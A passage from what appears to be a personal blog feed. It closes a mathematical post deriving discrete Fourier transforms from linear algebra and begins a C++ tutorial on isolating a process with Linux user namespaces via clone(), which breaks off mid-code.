We can verify that for $t = N$,</p> $e^{i \omega_k N} = e^{i 2 \pi k} = (e^{i 2 \pi})^k = 1$ <p>The signal $\vec{u}^{(k)}$ can now be re-written as</p> $u_t^{(k)} = e^{i \frac{2 \pi k t}{N}} \qquad t, k = 0, \cdots, N-1$ <p>The inner product of two elements $\vec{u}^{(n)}$ and $\vec{u}^{(m)}$ is</p> $\langle \vec{u}^{(n)}, \vec{u}^{(m)} \rangle = \sum_{t=0}^{N-1} u_t^{(n)} \bar{u}_t^{(m)}$ <p>Expanding their definition, and using the fact that the complex conjugate of $e^{ix}$ is $e^{-ix}$ we have:</p> $= \sum_{t=0}^{N-1} e^{i (2 \pi n t)/N} e^{- i (2 \pi m t)/N}$ $= \sum_{t=0}^{N-1} e^{i (2 \pi (n - m) t)/N}$ <p>Let’s define $\alpha = e^{i (2 \pi (n - m))/N}$, so the sum above is</p> $= \sum_{t=0}^{N-1} \alpha^t$ <p>If $n = m$, then $\alpha = 1$, so the sum above is $N$. If $n \neq m$, we can use the closed form of this geometric series:</p> $= \frac{1 - \alpha^N}{1 - \alpha}$ <p>We have that $\alpha^N = e^{i (2 \pi (n - m))} = 1$ and $\alpha \ne 1$ (since $0 &lt; \abs{n - m} &lt; N$), so the series above is 0. Summarizing:</p> $\begin{equation} \langle \vec{u}^{(n)}, \vec{u}^{(m)} \rangle =\left\{ \begin{array}{@{}ll@{}} N, &amp; \text{if}\ n = m \\ 0, &amp; \text{otherwise} \end{array}\right. \end{equation}$ <p>which proves that the vectors in the family are mutually orthogonal. The above also shows that the length of the vector is $\sqrt{N}$, since $\norm{\vec{u}^{(n)}}^2 = \langle \vec{u}^{(n)}, \vec{u}^{(n)} \rangle = N$. So if we want to make these <em>orthonormal</em> we just need to include the $\frac{1}{\sqrt{N}}$ factor in $\vec{u}^{(n)}$:</p> $u_t^{(k)} = \frac{1}{\sqrt{N}} e^{i \frac{2 \pi k t}{N}} \quad t = 0, \cdots, N-1$ <p>This shows $\vec{u}^{(k)}$ forms a basis for $\mathbb{C}^N$, which is also known as the <em>Fourier basis</em>.</p> <h3 id="dft-as-a-change-of-basis">DFT as a Change of Basis</h3> <p>Consider $\vec{x} \in \mathbb{C}^N$. 
It’s usually represented as $\vec{x} = (x_0, \cdots, x_{N-1})$ where $x_i$ is the coefficient of the linear combination of the canonical basis (i.e. $(1, \cdots, 0), (0, 1, \cdots, 0), \cdots (0, \cdots, 1)$) that generates $\vec{x}$.</p> <p>We can also represent $\vec{x}$ as a linear combination of the Fourier basis, that is $\vec{u}^{(k)}$:</p> $\vec{x} = \sum_{k=0}^{N-1} \lambda_k \vec{u}^{(k)}$ <p>Recalling each element in $\vec{u}^{(k)}$ is defined as $u_t^{(k)} = \frac{1}{\sqrt{N}} e^{i \frac{2 \pi k t}{N}}$, $t = 0, \cdots, N-1$, we can also express a specific element $x_t \in \vec{x}$:</p> $(1) \quad x_t = \sum_{k=0}^{N-1} \lambda_k {u}^{(k)}_t = \frac{1}{\sqrt{N}} \sum_{k=0}^{N-1} \lambda_k e^{i \frac{2 \pi k t}{N}}$ <p>This linear operation is invertible, so we can find $\lambda_k$ from $\vec{x}$:</p> $(2) \quad \lambda_k = \frac{1}{\sqrt{N}} \sum_{t=0}^{N-1} x_t e^{- i \frac{2 \pi t k}{N}}$ <p>Expression (2) should look familiar! It’s the <strong>discrete Fourier transform</strong>, while (1) is the <strong>inverse discrete Fourier transform</strong>. A more common form is to not include the factor $\frac{1}{\sqrt{N}}$ in $\vec{\lambda}$ by having</p> $\quad \lambda'_k = \sum_{t=0}^{N-1} x_t e^{- i \frac{2 \pi t k}{N}}$ <p>and then include it in (1):</p> $(3) \quad x_t = \frac{1}{N} \sum_{k=0}^{N-1} \lambda'_k e^{i \frac{2 \pi k t}{N}}$ <p>In signal processing, $\vec{x}$ is said to be in the <em>time domain</em>, while $\vec{\lambda}$ in the <em>frequency domain</em>. 
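As a sanity check of the transform pair, here is a naive $O(N^2)$ implementation of $\lambda'$ and of (3), confirming they invert each other (an illustration only, not the FFT one would use in practice):

```python
import cmath
import math

def dft(x):
    """Forward transform: lambda'_k = sum_t x_t e^{-i 2 pi t k / N}."""
    N = len(x)
    return [sum(x[t] * cmath.exp(-2j * math.pi * t * k / N) for t in range(N))
            for k in range(N)]

def idft(lam):
    """Inverse transform (3): x_t = (1/N) sum_k lambda'_k e^{i 2 pi k t / N}."""
    N = len(lam)
    return [sum(lam[k] * cmath.exp(2j * math.pi * k * t / N) for k in range(N)) / N
            for t in range(N)]

x = [1.0, 2.0, 3.0, 4.0]
x_back = idft(dft(x))
# The round trip recovers x up to floating-point error.
assert all(abs(a - b) < 1e-9 for a, b in zip(x, x_back))
```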
In our vector space point of view, they can be seen as the representation of $\vec{x}$ in different bases, and the Fourier transform is a linear transformation that can be interpreted as a change of basis, mapping one set of coefficients into the other.</p> <h2 id="discrete-fourier-series">Discrete Fourier Series</h2> <p>The Discrete Fourier Series (DFS) generalizes the Discrete Fourier Transform (DFT) for signals $\widetilde{\vec{x}}$ which are infinite but periodic, that is, they have a finite repeating pattern $\vec{x} \in \mathbb{C}^N$. The vector $\vec{u}^{(k)}$ is still the same except it now has infinite length:</p> $u_t^{(k)} = \frac{1}{\sqrt{N}} e^{i \frac{2 \pi k t}{N}} \quad t \in \mathbb{Z}$ <p>Note that $\vec{u}^{(k)}$ is periodic.</p> <p>The interesting part is that we still only need $N$ vectors $\vec{u}^{(k)}$ to represent $\widetilde{\vec{x}}$, because even though it’s infinite in length, the pattern is finite. As an example to help with the intuition, consider the infinite periodic vector $(1, 2, 3, 1, 2, 3, \cdots)$, with finite pattern $(1, 2, 3)$. 
It can be defined as a linear combination of only 3 infinite periodic vectors $(1, 0, 0, 1, 0, 0, \cdots)$, $(0, 1, 0, 0, 1, 0, \cdots)$ and $(0, 0, 1, 0, 0, 1, \cdots)$.</p> <p>Equation (1) then becomes:</p> $\widetilde{x}_t = \sum_{k=0}^{N-1} \lambda_k {u}^{(k)}_t = \frac{1}{\sqrt{N}} \sum_{k=0}^{N-1} \lambda_k e^{i \frac{2 \pi k t}{N}}$ <p>Note that $\vec{\lambda}$ is of finite length $N$, but we can use periodic extension to turn it into an infinite periodic vector $\widetilde{\vec{\lambda}}$ in which case the inverse applies:</p> $\widetilde{\lambda}_t = \frac{1}{\sqrt{N}} \sum_{k=0}^{N-1} x_k e^{- i \frac{2 \pi k t}{N}}$ <h2 id="discrete-time-fourier-transform">Discrete-Time Fourier Transform</h2> <p>The Discrete-Time Fourier Transform (DTFT) generalizes the Discrete Fourier Transform (DFT) for signals which are infinite and <em>aperiodic</em>.</p> <p>We’ll see how to define the transform using the same basic ideas we did for the DFT. Before that, let’s revisit the concept of the <em>Riemann sum</em>.</p> <h3 id="riemann-sum">Riemann Sum</h3> <p>The <strong>Riemann sum</strong> is a way to approximate the area under a continuous curve with a discrete sum. This is basically the algorithm we use to compute the integral of a function in numerical analysis.</p> <p>More formally, suppose we want to integrate $f(x)$ for $a \le x \le b$ ($x \in \mathbb{R}$). 
The idea is to define $N - 1$ discrete intervals for $x$, $[x_0, x_1], [x_1, x_2], \cdots, [x_{N-2}, x_{N-1}]$, where $x_0 = a$, $x_{N-1} = b$ and $\Delta_{x_i} = x_{i+1} - x_i$, then choose a representative $x_i^{*} \in [x_i, x_{i+1}]$ and sum their areas:</p> $\int_{a}^{b} f(x) dx = \lim_{N \rightarrow \infty} \sum_{i=0}^{N-2} f(x^{*}_i) \Delta_{x_i}$ <h3 id="dtft-as-a-limit-of-a-dft">DTFT as a Limit of a DFT</h3> <p>We can now build some intuition by considering what the DFT looks like when $N \rightarrow \infty$.</p> <p>As before, we’ll define $\omega_k = \frac{2 \pi k}{N}$ for $k = 0, \cdots, N-1$ and $\vec{u}^{(k)}$:</p> $\vec{u}^{(k)}_t = e^{i \omega_k t} \quad t \in \mathbb{Z}$ <p>And as before we can express any infinite signal $\vec{x}$ as a linear combination of $\vec{u}^{(k)}$ (3):</p> $(4) \quad x_t = \frac{1}{N} \sum_{k = 0}^{N - 1} \lambda_k e^{i \omega_k t}$ <p>We’ll massage (4) so that it’s defined in terms of $\omega_k$ and it looks like the right side of the Riemann sum.</p> <p>Let’s define $\Delta_\omega$ as the distance between consecutive $\omega_k$, so $\Delta_{\omega_k} = \omega_{k + 1} - \omega_{k} = \frac{2\pi}{N}$. Note that $\Delta_{\omega_k}$ does not depend on the value of $k$, so we can also say $\Delta_{\omega_k} = \Delta_{\omega}$.</p> <p>We can get rid of the $\frac{1}{N}$ in (4) by defining it in terms of $\Delta_\omega$:</p> $\quad x_t = \frac{\Delta_{\omega}}{2 \pi} \sum_{k = 0}^{N - 1} \lambda_k e^{i \omega_k t}$ <p>We can push $\Delta_\omega$ inside the sum and add the index:</p> $\quad x_t = \frac{1}{2 \pi} \sum_{k = 0}^{N - 1} \lambda_k e^{i \omega_k t} \Delta_{\omega_k}$ <p>We can define $\lambda_k$ in terms of $\omega_k$ since $\vec{\lambda}$ is just a set of variables we’re defining and there’s a 1:1 mapping between $k$ and $\omega_k$, so we could just relabel $\lambda_k$ as $\lambda_{\omega_k}$. 
Let’s assume $\lambda$ is a function instead, so:</p> $\quad x_t = \frac{1}{2 \pi} \sum_{k = 0}^{N - 1} \lambda(\omega_k) e^{i \omega_k t} \Delta_{\omega_k}$ <p>Let’s also abstract $\lambda(\omega_k) e^{i \omega_k t}$ as a function of $\omega_k$, say, $f(\omega_k)$:</p> $\quad x_t = \frac{1}{2 \pi} \sum_{k = 0}^{N - 1} f(\omega_k) \Delta_{\omega_k}$ <p>This now looks exactly like the format we wanted. Observing that $\omega_k \in [\omega_k, \omega_{k+1}]$, $\omega_0 = 0$ and $\omega_{N-1} \rightarrow 2 \pi$ as $N \rightarrow \infty$, we can express (4) as:</p> $x_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} f(\omega) d\omega$ <p>We can “unwrap” $f$ and get:</p> $(5) \quad x_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} \lambda(\omega) e^{i \omega t} d\omega$ <p>We can define the inverse of (5) to obtain $\lambda(\omega)$:</p> $(6) \quad \lambda(\omega) = \sum_{t = 0}^{N-1} x_t e^{-i \omega t} \quad 0 \le \omega \le 2 \pi$ <p>Another note on notation: $\lambda(\omega)$ is often denoted as $X(e^{i\omega})$ in signal processing to make it obvious it’s a periodic function.</p> <p>We can show that (6) is the <em>inverse transform</em> of (5).</p> <p><em>Proof:</em> We can verify this claim by replacing (6) in (5):</p> $\frac{1}{2 \pi} \int_{0}^{2 \pi} (\sum_{j = 0}^{N-1} x_j e^{-i \omega j}) e^{i \omega t} d\omega$ <p>Moving the second exponential into the sum and grouping them:</p> $\frac{1}{2 \pi} \int_{0}^{2 \pi} \sum_{j = 0}^{N-1} x_j e^{i \omega (t - j)} d\omega$ <p>We can also swap the sum and integral:</p> $\frac{1}{2 \pi} \sum_{j = 0}^{N-1} x_j \int_{0}^{2 \pi} e^{i \omega (t - j)} d\omega$ <p>Now if $t = j$, $\int_{0}^{2 \pi} e^{i \omega 0} d\omega = \int_{0}^{2 \pi} 1 d\omega = 2 \pi$. Otherwise, define $k = t - j$, $k \in \mathbb{Z}$. 
Then</p> $\int_{0}^{2 \pi} e^{i \omega k} d\omega = \frac{1}{i k} e^{i \omega k} \bigg\rvert_{0}^{2 \pi} = \frac{1}{i k} (e^{i 2 \pi k} - e^{0}) = 0$ <p>Since $e^{i 2 \pi k} = e^{0} = 1$, the only index $j$ for which $e^{i \omega (t - j)}$ is non-zero is $j = t$, in which case it’s $2\pi$, which shows:</p> $\frac{1}{2 \pi} \int_{0}^{2 \pi} (\sum_{j = 0}^{N-1} x_j e^{-i \omega j}) e^{i \omega t} d\omega = x_t$ <p><em>QED</em></p> <h3 id="convergence">Convergence</h3> <p>For $\lambda(\omega)$ (6) to be defined, we need to show that its partial sums exist and are finite. Let the $N$-th partial sum of (6) be $\lambda_N(\omega)$:</p> $\lambda_N(\omega) = \sum_{t = 0}^{N-1} x_t e^{-i \omega t}$ <p>If $\vec{x}$ is <strong>absolutely convergent</strong>, that is, there is $L$ such that</p> $\sum_{t=0}^{N} \abs{x_t} = L, \qquad N \rightarrow \infty$ <p>then it’s possible to show that $\lambda_N(\omega)$ converges to $\lambda(\omega)$ uniformly, that is, for any arbitrary $\epsilon$,</p> $|\lambda_N(\omega) - \lambda(\omega)| &lt; \epsilon, \quad 0 \le \omega \le 2 \pi, N \rightarrow \infty$ <p>and that $\lambda(\omega)$ is continuous.</p> <p>On the other hand, if $\vec{x} \in \ell^2$ (i.e. it has finite energy), the above might not be the case. However it can be shown (the <a href="https://en.wikipedia.org/wiki/Riesz%E2%80%93Fischer_theorem">Riesz–Fischer theorem</a>) that $\lambda_N(\omega)$ converges with respect to the $L^2[0, 2 \pi]$ norm to some function $f$, that is:</p> $\int_{0}^{2 \pi} \norm{\lambda_N(\omega) - f(\omega)}^2 d\omega = 0$ <p>when $N \rightarrow \infty$.</p> <p>Another way to see this: if $\vec{x}$ is <em>absolutely convergent</em>, there’s a function that converges to $\lambda(\omega)$ exactly. 
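</p> <p>As a concrete instance of the first case, take the one-sided geometric signal $x_t = a^t$ for $t \ge 0$ (and $x_t = 0$ otherwise) with $|a| &lt; 1$, an example chosen here purely for illustration. It is absolutely convergent, and summing the geometric series gives a closed form:</p> $\lambda(\omega) = \sum_{t=0}^{\infty} a^t e^{-i \omega t} = \frac{1}{1 - a e^{-i \omega}}$ <p>which is a continuous function of $\omega$, as the uniform convergence result predicts.</p> <p>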
If $\vec{x} \in \ell^2$, there’s a function that is not exactly like $\lambda(\omega)$, but is arbitrarily close when using $L^2[0, 2 \pi]$ to measure distance.</p> <h2 id="summary">Summary</h2> <p>One way to quickly differentiate between DFT, DFS and DTFT is based on the types of signals they’re defined for:</p> <div class="center_children"> <table> <thead> <tr> <th>Transform</th> <th>Signal</th> </tr> </thead> <tbody> <tr> <td>DFT</td> <td>Finite</td> </tr> <tr> <td>DFS</td> <td>Infinite, periodic</td> </tr> <tr> <td>DTFT</td> <td>Infinite, aperiodic</td> </tr> </tbody> </table> </div> <h2 id="conclusion">Conclusion</h2> <p>In this post we butchered the notation from signal processing and handwaved rigour from the math side, so late apologies if this upsets the reader.</p> <p>Also in this post, we got some mathematical intuition behind Fourier transforms. I’ve known the signal processing interpretation of the Fourier transform as the decomposition of periodic signals into pure sinusoids, but the mathematical approach also adds more formalism and helps in understanding some constraints such as why we would want signals with finite energy.</p> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="https://www.kuniga.me/blog/2020/11/21/quantum-fourier-transform.html">Quantum Fourier Transform</a>. We ran into Fourier transforms before in the context of Quantum computing. At that time I relied on the transform formula without further insights on its origin.</li> </ul> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">1</a>] Signal Processing for Communications, Prandoni and Vetterli.</li> <li>[<a href="https://stackoverflow.com/questions/40894278/vertical-lines-to-points-in-scatter-plot">2</a>] Stack Overflow: Vertical lines to points in scatter plot</li> <li>[3] A. Duncan, “The Analytic Impulse,” J. Audio Eng. Soc., vol. 36, no. 5, pp. 
315-327, (1988 May)</li> <li>[<a href="https://en.wikipedia.org/wiki/Root_of_unity">4</a>] Wikipedia - Root of unity</li> <li>[<a href="https://en.wikipedia.org/wiki/Convergence_of_Fourier_series">5</a>] Wikipedia - Convergence of Fourier series</li> </ul>Guilherme KunigamiIn this post we’ll study three flavors of discrete Fourier transforms, the classic Discrete Fourier Transform but also Discrete Fourier Series and Discrete-Time Fourier Transform. We’ll focus on their mathematical rather than their physical interpretation and will come up with their formulas from linear algebra principles. Later we’ll also discuss the difference between each type of transform.Namespace Jailing2021-07-02T00:00:00+00:002021-07-02T00:00:00+00:00https://www.kuniga.me/blog/2021/07/02/namespace-jail<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In a <a href="https://www.kuniga.me/blog/2021/04/19/chroot-jail.html">previous post</a> we investigated a jail system using chroot with the conclusion that it was not a safe implementation. In this post we’ll study a safer alternative using Linux namespaces. We’ll develop a C++ application along the way.</p> <!--more--> <h2 id="linux-namespaces">Linux Namespaces</h2> <p>The idea of Linux namespaces is actually very close to that of a sandbox. We want to create subsystems within a system which are isolated, so if they’re tampered with, the hosting system is protected.</p> <p>Linux allows sandboxing different pieces of its system. For example the user namespace consists of a separate set of users and groups.</p> <p>There are at least 8 different namespaces available, but for the purposes of our simple sandbox, we’ll focus on 2: the user and mount namespaces.</p> <h2 id="setup">Setup</h2> <p>We’ll develop a C++ application to create a jailed process. 
The idea is to define a base class that does the heavy-lifting and exposes some parameters that child classes can configure.</p> <p>The base class stub follows:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">};</span></code></pre></figure> <p>and a sample child class:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="cp">#include "sub_process.cpp" </span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="p">};</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">auto</span> <span class="n">process</span> <span class="o">=</span> <span class="n">ShellProcess</span><span class="p">();</span> <span class="k">return</span> <span class="n">process</span><span class="p">.</span><span class="n">run</span><span class="p">();</span> <span class="p">}</span></code></pre></figure> <p>We’ll assume the existence of some utils functions:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// utils.h</span> <span class="c1">// prints action to stderr + string representation of errno</span> <span class="kt">void</span> <span class="nf">error_action</span><span class="p">(</span><span class="n">string</span> <span class="n">action</span><span class="p">);</span> <span class="c1">// error_action + exit program with failure</span> <span 
class="kt">void</span> <span class="nf">fatal_action</span><span class="p">(</span><span class="n">string</span> <span class="n">action</span><span class="p">);</span> <span class="c1">// format string using printf() syntax</span> <span class="n">string</span> <span class="nf">format</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">format</span><span class="p">,</span> <span class="p">...);</span></code></pre></figure> <h2 id="cloning">Cloning</h2> <p>The <a href="https://man7.org/linux/man-pages/man2/clone.2.html"><code class="language-plaintext highlighter-rouge">clone()</code></a> function is a general version of <code class="language-plaintext highlighter-rouge">fork()</code> , which allows for more granular configuration. It can be used to start a new child process. It takes a few arguments:</p> <ul> <li>Pointer to a function <code class="language-plaintext highlighter-rouge">f</code></li> <li>Pointer to a stack</li> <li>Clone flags</li> <li>Pointer to object which will be passed to <code class="language-plaintext highlighter-rouge">f</code></li> </ul> <p>This function will create a child process and make it execute <code class="language-plaintext highlighter-rouge">f</code> with the provided arguments. The clone flags will determine what capabilities this child process will have, including what namespaces it will use. Let’s start with no flags for now.</p> <p>The parent process will receive the child <code class="language-plaintext highlighter-rouge">pid</code> from <code class="language-plaintext highlighter-rouge">clone()</code> and continue its execution.</p> <p>We’re mostly interested in <code class="language-plaintext highlighter-rouge">f</code> for now. 
Assume we have a function <code class="language-plaintext highlighter-rouge">allocate_stack()</code> that will allocate some memory for the stack available to the child process.</p> <p>We want the child process to call a function in <code class="language-plaintext highlighter-rouge">ShellProcess</code>, so we define an abstract function <code class="language-plaintext highlighter-rouge">child_function()</code> which the child class has to implement. We also add <code class="language-plaintext highlighter-rouge">child_function_wrapper()</code> so our base class can execute some code when in the child process.</p> <p>We can’t pass non-static methods as function pointers, so we pass <code class="language-plaintext highlighter-rouge">this</code> as an argument to the static function <code class="language-plaintext highlighter-rouge">child_function_with_this()</code>.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="k">virtual</span> <span class="kt">int</span> <span class="n">child_function</span><span class="p">()</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">static</span> <span class="kt">int</span> <span class="n">child_function_with_this</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">context</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="k">static_cast</span><span class="o">&lt;</span><span class="n">NamespaceProcess</span><span class="o">*&gt;</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="o">-&gt;</span><span class="n">child_function_wrapper</span><span class="p">();</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">child_function_wrapper</span><span 
class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="n">child_function</span><span class="p">();</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">create_child</span><span class="p">(</span><span class="kt">int</span> <span class="n">clone_flags</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">stack_top</span> <span class="o">=</span> <span class="n">allocate_stack</span><span class="p">();</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">clone</span><span class="p">(</span> <span class="o">&amp;</span><span class="n">NamespaceProcess</span><span class="o">::</span><span class="n">child_function_with_this</span><span class="p">,</span> <span class="n">stack_top</span><span class="p">,</span> <span class="n">clone_flags</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="k">this</span> <span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"Cloning"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">pid</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> 
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">};</span></code></pre></figure> <p>The child class looks like:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">child_function</span><span class="p">()</span> <span class="p">{</span> <span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">"Hello World"</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">};</span></code></pre></figure> <p>We should be able to compile and run this, but we might not see any results because the parent process ends before the child can run. We need some synchronization.</p> <h2 id="synchonization-i">Synchronization I</h2> <p>We want the parent process to wait for the child to finish. 
We can wait for the <code class="language-plaintext highlighter-rouge">SIGCHLD</code> signal, which the child will only emit if we pass the <code class="language-plaintext highlighter-rouge">SIGCHLD</code> flag to <code class="language-plaintext highlighter-rouge">clone()</code>:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">SIGCHLD</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// Wait for child to finish</span> <span class="kt">int</span> <span class="n">status</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="n">wait</span><span class="p">(</span><span class="o">&amp;</span><span class="n">status</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">};</span></code></pre></figure> <h2 id="shell-process">Shell Process</h2> <p>Let’s use a better implementation for <code class="language-plaintext highlighter-rouge">ShellProcess</code> so we can try out commands in a jailed environment.</p> <p>In the example below we start a new shell, replacing the current child process. 
We customize it with a new <code class="language-plaintext highlighter-rouge">PS1</code> so it’s more obvious when we are inside the child process.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">child_function</span><span class="p">()</span> <span class="p">{</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">env</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="s">"PS1=^_^: "</span><span class="p">,</span> <span class="nb">NULL</span> <span class="p">};</span> <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">execle</span><span class="p">(</span> <span class="s">"/bin/bash"</span><span class="p">,</span> <span class="s">"/bin/bash"</span><span class="p">,</span> <span class="s">"--norc"</span><span class="p">,</span> <span class="s">"-i"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">env</span> <span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"Failed to start shell"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>We can try it out:</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">$: g++ -std=c++17 main.cpp utils.cpp ./a.out ^_^: whoami 
kunigami ^_^: sudo su</code></pre></figure> <p>By default the child process has access to the same resources as the parent, including root access. We want to restrict that.</p> <h2 id="user-isolation">User Isolation</h2> <p>We’re ready for our first namespace, the user. We can simply do so by adding <code class="language-plaintext highlighter-rouge">CLONE_NEWUSER</code> to the flags passed to <code class="language-plaintext highlighter-rouge">clone()</code>.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">SIGCHLD</span> <span class="o">|</span> <span class="n">CLONE_NEWUSER</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// ...</span> <span class="p">}</span> <span class="p">};</span></code></pre></figure> <p>When we run:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">^_^: <span class="nb">whoami </span>nobody ^_^: <span class="nb">id </span><span class="nv">uid</span><span class="o">=</span>65534 <span class="nv">gid</span><span class="o">=</span>65534 <span class="nb">groups</span><span class="o">=</span>65534</code></pre></figure> <p>The user metadata starts blank and <code class="language-plaintext highlighter-rouge">65534</code> represents undefined. Let’s fix this.</p> <h2 id="mapping-user-ids">Mapping User IDs</h2> <p>We can create a mapping between IDs inside the namespace and outside. 
The map is stored in the file <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code>, where <code class="language-plaintext highlighter-rouge">&lt;pid&gt;</code> is the ID of the current process.</p> <p>So for example, if we have a process with PID 31378, we can inspect that file:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">&gt;</span> <span class="nb">cat</span> /proc/31378/uid_map 0 0 4294967295</code></pre></figure> <p>Each line represents one mapping. The meaning of each column is “ID_inside-ns”, “ID-outside-ns” and “length”. These three numbers represent 2 ranges of the same length, the first is <code class="language-plaintext highlighter-rouge">[ID_inside-ns, ID_inside-ns + length - 1]</code> and the second is <code class="language-plaintext highlighter-rouge">[ID_outside-ns, ID_outside-ns + length - 1]</code>, and ids in the first range map to ids in the second range.</p> <p>This is much easier to understand with an example: if we have a line with <code class="language-plaintext highlighter-rouge">10 1000 3</code>, it means the range of ids <code class="language-plaintext highlighter-rouge">[10, 11, 12]</code> in the current process maps to the parent process <code class="language-plaintext highlighter-rouge">[1000, 1001, 1002]</code>, thus <code class="language-plaintext highlighter-rouge">0 0 4294967295</code> (which is the default mapping) effectively represents a 1:1 mapping between every id.</p> <p>We can create a simple map so that the user ID 0 in the child maps to our current user running the parent:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="n">map</span><span class="o">&lt;</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="o">&gt;</span> <span class="n">get_uid_map</span><span class="p">()</span> <span class="p">{</span> <span class="n">map</span><span 
